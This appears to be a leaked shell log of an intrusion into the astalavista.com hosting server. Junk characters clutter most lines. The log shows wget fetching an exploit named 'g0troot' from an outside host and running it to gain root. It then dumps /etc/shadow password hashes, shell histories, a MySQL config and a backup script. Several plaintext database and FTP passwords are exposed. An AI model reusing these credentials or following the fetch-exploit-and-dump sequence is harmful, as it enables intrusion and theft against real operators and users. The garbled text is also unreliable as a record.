0 [) j, F  k& U* s4 \1 t& V. M6 T! Q0 v, s* W" N  f( ?
sh-3.2$ uname -a
) A% {. v0 |1 Q$ A0 O. vLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux% Z: r; h, ?3 k+ ~6 T9 _
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ K$ \+ f" E) F9 t- q–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]$ z9 y+ \7 C) [
Resolving anti.sec.labs… 13.33.33.37
! Q* f' K7 u$ h3 o! j2 g6 @Connecting to anti.sec.labs|13.33.33.37|:80… connected.( ^( I) t5 A" d! r* a" i. w
HTTP request sent, awaiting response… 200 OK+ E3 C3 G" X3 U! J9 l; h
Length: 18200 (18K) [text/plain]
7 I) @2 `2 {2 pSaving to: `g0troot’* `0 \: S& Z! k8 L/ G4 [

8 H& \  e6 ?- v  u# c" \$ U100%[=========================================================================================================================================>] 18,200      58.6K/s   in
; ?- b+ X( A6 q/ c0.3s, c, y% N2 f* Y0 m
9 z1 X5 s" r- V6 \
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
2 C2 V! |5 @) B+ r& C3 J9 G+ Y* R3 K& J) y4 N) c( n4 z( W
sh-3.2$ ./g0troot -i x86_648 n; e2 I6 W, X- U! e" r8 a
[+] g0troot - anti.sec.labs
5 j3 W6 t9 Q& f4 N- \, S[+] Target: 2.6.18-128.1.10.el5& Q* l4 _; d  M8 t2 j" k. D
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]; G1 L& d; K. U
" S$ k; A2 X( `2 p% j, Z! q! U7 j
[+] r00tr00t
4 A# s9 ~  P% u  f& T9 _' P7 g1 O* V[~] Executing shell…3 r; `4 w* j8 t& X7 `8 k1 F; U
) C4 x# d, H4 E  _; D
sh-3.2# id4 A2 F* N2 V- F% c! d$ Y
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)( H& k9 i+ D# \7 u

, G5 `$ d0 b0 x% G7 b& b. Ssh-3.2# cat /etc/shadow
2 r  q( e' R4 O. h" }root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::) y6 ^& ?# `$ Z
[snip]
" Z! _- N( u; B  y; n) x( gadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::3 F% X9 n0 N, ?/ Q% Q6 ?; {
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::# C# x* W  n! b; t. \4 k3 e
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::. t8 h7 I2 l) r' g
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
$ o6 @3 [. D4 P; M8 x- a2 y# d0 D* S6 V
! |/ a0 ~6 ^6 U; K$ dsh-3.2# cat /etc/motd: g( x7 v  v% K1 b. G7 ^3 V7 D. A
#####################################################
( E) }9 e+ s' ^7 x#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #0 o! q9 P9 s& T5 L% {
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #
" Z# S* Z/ ]+ x# ]. O% Q# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #9 p/ |6 o9 D; D# V! t; k) p# h4 u
#                                                   #$ s8 v4 M% P5 [( S5 q5 \. v
#####################################################2 q' Y1 ~. ~" G0 D4 D! h
#                                                   #- I5 C8 c. L4 [# l: t6 S! f9 X
# Admin Contact - 链接标记support@secureservertech.com      #
0 T1 J0 `4 Q/ }, `7 B( }#                                                   #- Q/ E( H( o3 W
# Available ShortCuts                               #
) J/ x/ `# c/ M  N' ^+ ]* l5 b#                                                   #0 l8 w4 _3 g! T* ?: z  `
# nst -  list active connections                    #
! b; e6 P  B5 K$ N/ [3 Y1 E# ddos - shows how many times each ip is connected  #
4 o# U- b8 Z& z' i# ltr -  restart the webserver                      #
' }+ X. }+ [8 b. _3 |  W# phpc - edit the php config file                   #1 X9 d$ ~) K2 ?: y$ b( o
# htc -  edit the webserver configuration file      #
+ `; q5 s! G& f  H! u  y. I# up -   uptime                                     #. {8 a6 g3 R) S& L6 a
# etd - edit the motd of the day file               #
" |' K$ I+ B2 V( p# htr - start and restart apache if needed          #. N/ O' j9 j) \. W2 u7 }; w) J
# syng - shows active SYN_RECV connections          #3 N6 {0 [, L. c
# synd - syn flood blocker - “synd -h” for usage    #
! h2 H3 z& n  G: T5 g& c#####################################################
2 z' W+ ]7 o& d( F7 Q/ F# NOTES:                                            #. c" B: `" o+ D9 _" d. Y) h
# Last Upgrade - 12-08-2008 by JF                   #( Z' V2 Q# F" }% L# Z# z0 [! H8 u
# My.cnf/Mysql Optimization - 1-28-09               #
# O9 L+ Y. F* [. n7 z#                                                   #
; _" U6 m0 J& |) M2 L7 k1 r" u: U#                                                   #
" Y, d* r3 O! f. x0 V4 b4 u#                                                   #
8 l3 X9 W9 h3 A#####################################################: `. I' ^0 z& U, H# T' L
1 m4 s/ O" W5 A: Q) [& O
sh-3.2# lastlog | grep -v Never
9 ^. h+ z  Y! P3 k: s( u( \Username         Port     From             Latest
& J4 @3 W7 m. V4 k. M  f# [& \root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009- H, b' U7 P! F1 `* h2 s
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008+ L9 g; m3 ], L
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
* s8 ]) B9 G; U; a# Gastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
/ a7 v/ z1 h- m' w4 T3 U7 C
" e, r* x% k& f0 u3 p1 t) d2 zsh-3.2# ls -la
$ ]3 L( H% K' D# Ntotal 453376
* x0 T6 l3 {$ @0 E4 Y/ X1 H, idrwxr-x— 15 root root       4096 Jun  4 08:40 .
- G$ C) ~; e& U4 e* Vdrwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
7 E3 a& {& k( K: x# \-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip
3 D7 l+ C& f! g; ^-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
% k# a5 u' K+ o& r+ s  u/ f" \-rw——-  1 root root      16836 Jun  4 07:21 .bash_history3 {, E7 R: S3 z0 L4 `
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout" V+ u' Y  P  B! U) E
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile
1 `3 I& A8 {3 G9 ?-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc
/ W& t. E8 p( s2 N3 s, o) B+ s. Q8 D  `-rwx——  1 root root       1899 Oct 28  2007 bk.sh5 s9 c' x7 e) N3 B
-rw-r–r–  1 root root       1327 Nov 29  2007 cert. L' w5 D" i9 }$ Z, `) |$ R- v, w
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql
- T! Y3 ]  \  n4 o& b$ |drwxr-xr-x  4 root root       4096 May 20  2008 .cpan2 t& V& m1 k6 H/ N: P4 K. H- F
-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
8 J6 p& k; s- n, V-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql
2 V; c$ g+ P. a. D' H, G3 zdrwx——  2 root root       4096 Oct 28  2007 .elinks( s7 E4 `0 H. m/ a8 B" t
drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.17 G% y4 Q1 O+ i$ l9 c% C9 ?
-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz28 h; `$ d5 F! W- P8 i3 \) S
-rw——-  1 root root          0 Apr 16 13:19 .history
" h. a0 Z' m( {9 H$ d5 J# U+ B" c-rw-r–r–  1 root root      16095 Sep 11  2007 install.log
7 I1 P. o& S+ U1 k0 L-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog
% p7 D# `9 C  J# e-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh
7 G& }, t; O2 g4 B) g1 i-rw——-  1 root root         35 Jun  2 14:23 .lesshst4 j1 U$ |8 h1 v  a- S" B
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp# z# ?/ ~6 \3 O) U7 Y
drwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec+ }# C0 d- x6 `! c$ O$ b  L7 D
-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz' J$ \# B# a2 V( M' R( k
-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2: Y: ?3 _4 e% L
-rwx——  1 root root        760 Sep 18  2008 lp
; V: K% m" `) ydrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1  F4 z! a2 f- f, l2 G
-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz; J- t8 d* W6 F$ J
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.17 A" x/ J2 b: o; Q9 a) z6 _
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9
6 b) m4 z0 K: B/ b5 N  e-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
2 _; v" G) A% G1 j* _3 e2 J2 S, wdrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3$ p) R0 y- ?$ q% T+ a, f' R
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz" P1 u' z( _! x+ Y8 e" o. h. B
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
# T7 H) S  G- I$ t-rw——-  1 root root         41 Oct 19  2007 .my.cnf
! u* c8 C8 ?! t1 j2 \-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history( t$ y) `9 ?0 X# B6 q0 o
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
8 T5 s8 @2 v5 v" n-rw——-  1 root root         41 May 20  2008 .mytop- ^2 B, h! y0 E  b3 T3 ?
drwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6+ m5 k! P- {  K
-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz
- e# K" C! J  p1 ?drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp8 F' m/ |$ E$ I- z' E% _
-rw——-  1 root root       1462 Sep 21  2007 opt.php0 ]0 K/ C( Y* K" a0 o
-rw-r–r–  1 root root       3371 Sep 22  2007 p; A7 u: k. w% K  T5 s! E
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz20 T) V, U- J9 Y% y  T% o
-rw——-  1 root root       1024 Feb  3 21:32 .rnd
+ p# `7 c4 r. g( Z8 |  W0 Q-rw-r–r–  1 root root        716 Nov 28  2007 server.csr
) Q. [2 `, D& o( b0 l% H-rw-r–r–  1 root root        887 Nov 28  2007 server.key
8 p) d; G: w- ^6 m9 sdrwx——  2 root root       4096 Oct 10  2008 .ssh
  ~8 X( O. h' H8 n% H-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat' h3 X0 M9 w; J. D+ p+ |
-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc. U9 p6 A. p" W: e) w
-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
% v( V% {+ c% ]7 J6 P-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.1
* n) b- T: G! c# P3 rdrwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
) v; |) h  \0 F( b( ~-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
0 m4 s5 T# S5 N  }( e( ndrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
/ s4 ]; b5 u6 I3 p- w( Y  ~& U-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz20 v  f) `9 A# p# @' ~1 c2 z2 G; Y- r
-rw——-  1 root root      12997 May 16  2008 .viminfo' C: v& N7 q. D7 d( M

! _  c3 z6 Q5 B. msh-3.2# cat .bash_history8 o4 }% M6 S' {8 l" R
[snip]
+ s4 w4 E- I8 n# dwget cp4sst.com/sstlinux.tar.gz+ q- c5 n5 O( t& D8 G9 g0 P% A
tar zxvf sstlinux.tar.gz
) P2 [+ Z0 x, K0 i5 W4 \1 mcd linux-2.6.27.10% @9 C& C/ ^5 h
sh install.sh: `5 u; F& v5 m* L; T
make bzImage ; make modules ; make modules_install ; make install
/ J$ Z% J, h# w  Y" Nmake clean
6 a! J3 n/ f) q9 I  ?8 x8 e2 Lservice mysqld restart
  M( w8 L5 V8 N- ~* `/ y[snip]
/ H6 i; H. r) y% Rcd /usr/sbin/. j) o) _2 T4 l: T7 T
chmod 4777 traceroute4 D; J$ q% c" S3 Y6 j0 f, c* r
chmod 4777 ping. J' \8 Y5 h  w/ U% F' z! B8 U
traceroute -I 链接标记[url]www.astalavista.ch[/url]
5 d2 o; O" H* e- A6 a0 E  K[snip]
/ N6 ]: x1 }2 cvi /etc/csf/csf.conf& A2 D8 B# G8 K% \& @, {
traceroute google.ch* M: l$ s* l9 ^% [3 r
service csf restart; q, H6 c' b: d4 v
tracert google.ch
" u8 L9 h- |  M5 |. rservice csf restart0 T  p! Y5 ~5 p9 y- Z
traceroute 链接标记[url]www.google.ch[/url]% g( }+ ?" @# B$ m3 S) B+ H
tracert 链接标记[url]www.google.ch[/url]3 i" C! r$ t* z& X: c% H
traceroute 链接标记[url]www.google.ch[/url]/ ?" g$ u6 v% [+ K- H
locate traceroute
. G  ~7 [% B* b5 x* tchown 4755 /bin/traceroute0 C2 P$ a  q2 E7 @
chown 4777 /bin/traceroute
) l1 g! C, J' Rlocate ping
/ S' `# @0 R1 t9 K* P9 Pchown 4755 /bin/ping) x: i2 s- q) u, o9 X) y+ X
chown 4777 /bin/ping
' E  U5 `4 v3 Ocd /bin/
2 s- A+ @# S5 c& D  J0 qls -ali | grep ping
  g5 E6 n3 ^9 e- X/ Wchown root ping  V$ g3 C; K! f2 a1 _4 N% q
chmod 4755 ping. a0 x$ I, o  g0 @" `0 i; h
ls -ali | grep traceroute
( Q/ L; j1 L! Q9 t1 e, G+ @chown root traceroute
; D5 u( D. V: V/ bchmod 4755 traceroute: h  ^' D0 i8 R
ls -ali | grep traceroute2 ^/ G. X; K9 k
traceroute -I 链接标记[url]www.google.ch[/url]
+ S& K5 w1 P/ q; W$ D$ Wtraceroute 链接标记[url]www.google.ch[/url]( Z5 i5 [8 H* D% ]
whois pmsantos.ch1 F0 j7 k# R( _4 {7 d+ T" e
[snip]
& v3 b0 r" k% Q2 ^$ Ymysql -h com_contrexx2_live < /root/defaultp_ports.sql, a0 \' h. f; p# e  C! d( g
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql+ {5 h8 A- K0 v' C4 B3 g2 p
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql% T1 ]; x# s$ A% n
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql4 {3 ~& p: ]& w( X. q
top
8 j( ]3 @0 T( }- _+ Dping ssth.ch( V7 u. h) M# d
ping asdlkfaljgasd???ljg???lasj.ch5 N3 X/ s3 U  l0 {% C
ping asdlkfaljgasdlasj.ch, D- I+ i3 w; N7 k9 f: Z9 F- b
ping 链接标记[url]www.ssth.ch[/url]
+ Y/ p6 V# s$ V* rping ssth.ch1 u5 f" G+ A  a. x! u
nslookup 链接标记[url]www.google.ch[/url]* u# V/ T! i7 p4 o. A
nslookup 链接标记[url]www.ssth.ch[/url]
: k8 T4 R( G; X% hman nslookup
) x% A% U: J$ A2 uping 链接标记[url]www.google.ch[/url]$ U) m9 [/ `$ M7 B. ?
nslookup 链接标记[url]www.google.ch[/url], ^0 q/ ?* O/ h3 z7 o" p, w" [
nslookup 链接标记[url]www.google.ch[/url]8 u" h2 X' g/ [4 u
nslookup salfjasdlf.ch" f! M7 \. |" k, E* q% q+ V( \  [
[snip]  E. _: D" o2 }. f
openssl passwd -1 sadf) ?6 C$ g: d* B7 [
openssl passwd -1 5cZNHstdTy
- E: \9 g) m% v% F+ x9 P7 imysql
, r- w. Y' e* Q1 j/ J* Zmysql
9 T# \/ z; B9 q8 N- J$ \locate proftp
2 x$ N& R) b9 Y; {, T0 X/ ovi /etc/proftpd.passwd9 d$ p2 ]) ~! ^6 a
service proftpd restart" p5 _, N. F6 \2 j4 L* H  x9 v
locate proftpd.conf: P' f$ \' s; E$ a1 V/ z$ M! s
vi /etc/proftpd.conf" E% t2 S4 |' l2 ?4 h
vi /etc/proftpd.passwd
; Z7 @% ?9 t+ \* n3 H0 t5 l2 \service proftpd restart' ~0 m7 v- g8 `3 {4 J
[snip]
1 s' h; c7 }0 W9 X/bin/sh /home/com/backup_system/backup.sh5 D: f. n9 h* u& M  w) y
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin; w: t. ?% l* a5 j) K
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql) r5 L# u# m' a9 F# a
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql) i6 F9 n, F, a3 ?) N
ls -ali% I: j) o$ z3 K* H% S
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
/ n- z3 K* p$ {4 y8 smysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
8 w2 ]' f0 D4 V; m5 [9 p0 `0 P" ecrontab -l
5 |/ u/ J- }6 }3 _$ N4 x$ [; ccrontab -l) o' u" X1 T9 g; K. ]
php -q /home/com/public_html/modifications/cronjobs/securitynews.php' d) v! [; H, x' i9 r4 c
/home/com/public_html/modifications/cronjobs/exploits.sh
1 l/ C4 E7 f! W, o7 r: Q  Y5 {wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]( i& m; ?! F& g  w& z* `
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz# R& i  c2 W9 ~4 Y
cd lsws-4.0.3
* m3 o6 Q5 A9 T. B, e  L5 p& s8 \# Vsh install.sh
# c: E  `5 @! t/ g  l6 n" ?uptime4 D( n8 d; w; j8 w8 x
hdparm -tt /dev/sda
6 B, C+ y* u1 _2 miostat
& D2 T4 }/ ]7 f; Byum install iostat; R3 ?) [" i4 u- U7 L0 V# |
iostat
$ v4 ^3 O" i, \7 P5 wwhereis iostat) n4 P( Z2 ]0 N' B2 `, ?2 K8 S: H0 k! h0 Z
yjm clean all4 S; Y. K& s% h3 f. f% m
yum clean all ; yum -y update+ M& x  h' T/ }( V
iostat
4 U4 D+ [& F4 o' wyum install systat* N. U  l, }/ ~$ o' c: S' ], Z$ P* Y
rpm -qa | grep iostat
+ g1 h8 l0 I, U+ O3 \5 n$ R  f  N' m( zrpm -qa | grep sysstat
, w4 q: o: T' a3 }$ B& }rpm -qa | grep systat
. F6 ^- A* s2 b& @dmesg -c( n( h$ i/ s' g3 M
sysctl -p
) m' ^; f" s+ H4 Uuname -r
5 v/ V! g) I, i0 G9 U1 ]cd /usr/src
4 i- C, `+ t! x' `3 L* e2 `wget nix101.com/kernels/sstlinux.tar.gz
- `! ?* y! U, B* d1 c8 b& ishutdown -r now
0 t# ]. l4 F: u  m4 G' xnano -w /boot/grub/grub.conf
' J9 t3 Z/ l4 |+ p: v+ C& l/ b; N- k! V" F& W3 X  H
sh-3.2# cat .my.cnf
+ h# I" o# @4 Z7 ~, e9 U, K9 P[client]/ [1 z$ I1 K4 B& D
user=da_admin2 f5 F0 U  s* q- \
password=X9dctmRH
! J! u6 l9 Q" ^1 R4 f; P/ U) ?  g2 F6 m4 [5 F9 U9 W
sh-3.2# cat /home/com/backup_system/backup.sh6 a# {. l' `  g, x% H2 B- e3 Q
#!/bin/sh
3 o1 B( c, J: K#####################################################################
" L  r% a5 B$ l* ]" s0 g: {( K4 {#                                                                   #* v5 P5 U2 |  e1 E" E1 v  N6 Y
#   incremental backup for astalavista.com                          #
& [% Q3 k; }. Q  ^#                                                                   #
5 s! \& _* J+ i" P, R9 c; I#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
* A: F/ Y  A( V0 ~$ q% v. T9 l#                                                                   #
% \$ n# E( r2 j* h#####################################################################
4 h; X, k" B. i, a[snip]# T/ `7 N& {/ w6 M! L$ W
PROG_DIR=”/home/com/backup_system”;5 {7 k$ m/ G1 i( H6 x7 v! u5 G" O0 k$ k
BACKUP_DIR=”/home/com/backups”;+ y5 w. s: J2 s) b+ l/ Y3 i
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;* Q) _& n# ?( w( D8 ^
# ftp for synology backup server1 x6 u1 q* _9 T0 s# Z7 l# e
FTP_HOST=”212.254.194.163″;
/ o* b& Q/ q7 S+ b7 ]' ~FTP_PORT=”21″;
1 X4 N' y7 k8 QFTP_USER=”astalavista.com”;8 n. F1 `* u5 B3 W7 X
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
( V: W/ B) u  MFTP_DIR=”/astalavista.com”;5 |- b4 L) r, {" c
# database% h' I) r. H; z/ w" n4 |9 P
DB_HOST=”localhost”;9 S" ~: _8 E$ W3 R  i, N
DB_USER=”contrexxuser2″;5 U/ K) O. s. Q' l5 B3 g
DB_PASS=”0fEYNZgXz1pKe”;
1 \: s% Z3 M0 m4 t! fDB_DATABASE1=”com_contrexx2_live”;( G/ o* }: x: r9 D. D( B
DB_DATABASE2=”com_contrexx2″;
0 q0 e- Q1 ~- d[snip]  N0 W8 T8 u7 T! ^2 G( O
ftp -in $FTP_HOST $FTP_PORT <<EOF
+ t& K. c. w& c0 I0 _5 _5 Rquote USER $FTP_USER( L& m, P3 D) I% \# f2 X
quote PASS $FTP_PASS6 Z* N3 \# ~6 I; `0 v0 K
cd $FTP_DIR7 u; w* `0 x( h/ H
put $DB_FULLNAME-SQL_Dump.tar
$ s- z( X# m0 ?5 E7 X+ Kput $BACKUP_FULLNAME-Public_HTML.tar
7 E* ^" E3 S) y* y, sclose. q4 t6 N& S: V+ I, V/ e4 ~/ n
bye3 X' S5 [* Z; h8 @+ _& N
EOF$ `5 o4 T1 s2 A' J* N! H. w
+ b/ Q: K3 K8 Z7 ~1 w; ~( B+ a! ^5 l
sh-3.2# cd /home& T+ m7 \( x5 U# f
sh-3.2# ls -la
6 j1 h( |$ Z$ O  Ptotal 120, O5 S, i# F" K+ X, ~1 k* m
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .: ]2 L, l+ u0 @
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ... a3 t4 [6 Z0 G. F& d
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin/ C7 ^, y" R9 o+ n( k2 R+ H
-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group5 p1 p$ d5 {& V
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
9 `7 S3 @& J$ Z: n- Adrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
9 e) [' B8 m5 vdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
$ ^% o- O! ~! x+ Cdrwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161+ S' Y9 `0 X5 z6 ]) M; e$ ?
drwx–x–x 10 com     com      4096 Apr 28 12:40 com. _( D+ N2 Y  R8 x( s
drwxr-xr-x  2 root    root     4096 May 17  2007 ftp& w2 v9 k2 y) o4 |; g& C
drwx——  3 jon     jon      4096 Sep 21  2007 jon. w7 I2 J" c9 V6 o
drwx——  2 root    root    16384 Sep 11  2007 lost+found
! L7 R9 J1 ~/ T7 e. p0 Sdrwxr-xr-x  2 root    root     4096 Sep 14  2007 my
" y/ b6 n" Y2 @7 H4 ?7 c  A, Udrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata0 k( y! @/ y& V# C- l- ]
drwx——  2 jon     jon      4096 Sep 15  2007 test
& e- H% ]/ ?$ @drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
. `( _9 F4 ~9 n2 M; F
5 F- b/ ^! P! d" u* u2 n9 k' ]sh-3.2# cd admin% q+ M& Y  W6 y. ]3 l" N/ `
sh-3.2# ls -la* M% j" U3 w$ v+ ]! ?# }
total 1735896
3 R2 s8 ^' l/ [/ P' Bdrwx–x–x  9 admin admin       4096 Nov 28  2007 .. a- w' p7 Q4 J. |: U# S! j3 |
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
4 ]5 u6 g& Q( Rdrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups9 g4 G: h8 Z& Z
drwx——  2 admin admin       4096 Sep 28  2007 backups' X9 P7 @  `) e$ c) h7 S2 a
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history0 E/ s8 \& N. a1 s! S* F8 @4 K5 \
-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout: _* s% C! A5 V' n8 ?" d% M6 K
-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
( S7 A7 h. x, I0 X* E2 y; b-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc# D7 b+ z* f0 r. K6 J3 \
drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups) L) |+ ]+ Y% y! R2 Q1 o3 F9 f
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains) B; u6 ]/ P1 |+ t- o" |6 J
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap
- B8 f/ t! D7 R( l# T) S-rw-r–r–  1 root  root          24 Sep 21  2007 info.php6 v0 ]; p- n# C2 \, P
drwx——  2 admin admin       4096 Sep 21  2007 mail$ l# u1 P( r! d% J3 H3 a
-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr( e# ?2 Y' f! [$ H2 ?/ a3 Y) n
-rw-r–r–  1 root  root         887 Nov 28  2007 server.key, m+ I4 T* m8 S  d' t( h" X
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow5 Y, ]' n$ C& {
-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz) p4 m$ P! p# V2 k
drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups' U6 Y; ^1 j- b" F
1 E3 ]4 Q5 w( [
sh-3.2# ..4 X" k6 a% C5 G, _! W% P' b
sh-3.2# cd jon
. [& e' [9 T' K: y2 u  jsh-3.2# ls -la0 o! Z, J4 |  G2 f( j# I+ W
total 36
" ^; T, K( a- U  E) Mdrwx——  3 jon  jon  4096 Sep 21  2007 .
0 q. Z5 M* O6 }# F: Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
# \8 c" G- n3 D7 @7 c4 J3 d; w( ], h-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
/ w  S* z  p, i-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout
% w  A7 u# V8 z5 e-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile
' a) K8 r0 f6 I7 ~5 e7 j-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
8 Z# V, W: x% J- S-rw-r–r–  1 root root   24 Sep 21  2007 info.php8 C. |2 l( N: F; ^# U' v
drwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html
# V9 S( m" J& N% o; C& {# D; T9 {6 T
sh-3.2# cd ..
* ~; q+ _1 L' y# m5 Nsh-3.2# cd test* K, ^2 C/ q1 w; d: V! u6 l
sh-3.2# ls -la
4 {0 V  j* U) B( L2 r! W7 y( \( a; utotal 48
$ `9 J# s3 e9 o2 z# b5 T/ T& f# odrwx——  2 jon  jon  4096 Sep 15  2007 .! A7 b4 ^- k2 t# K/ B4 |, N9 |# s8 @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& {0 a/ j) i; v/ `, W- J
-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
$ z1 a2 k# I2 p' [-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout
& ^6 M! h+ W) N4 c-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile6 U' Y# _& ?% M3 e# q3 C# Y" B& i  L
-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
% X4 a5 v* q. x" G: d& Csh-3.2# cat .bash_history- ?6 ~7 C) Q+ ]4 u( h8 e; G
/usr/bin/mysqladmin -u root password PoliuJhytg674 a# \4 x& _2 C6 U/ W( i( ~! y

/ F( x9 O9 @1 Y0 ^' E' ~- nsh-3.2# cd ..
) n0 J; ]( D3 ~) ysh-3.2# cd astanet0 I8 C! f4 I/ S
sh-3.2# ls -la5 }; O( f3 ?" z& h* p1 G+ i; E. K
total 52
8 F; e  r) l( B0 ?drwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .( U* A1 x+ L; d5 m3 ^; y1 g
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..
% M2 Q7 ]3 \" [7 _drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
2 R6 I! ^8 W4 E! Z, E( d-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history$ U; `5 U* \: |: Q& t
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout) w8 ~; U" @; ?/ |, \# M( @
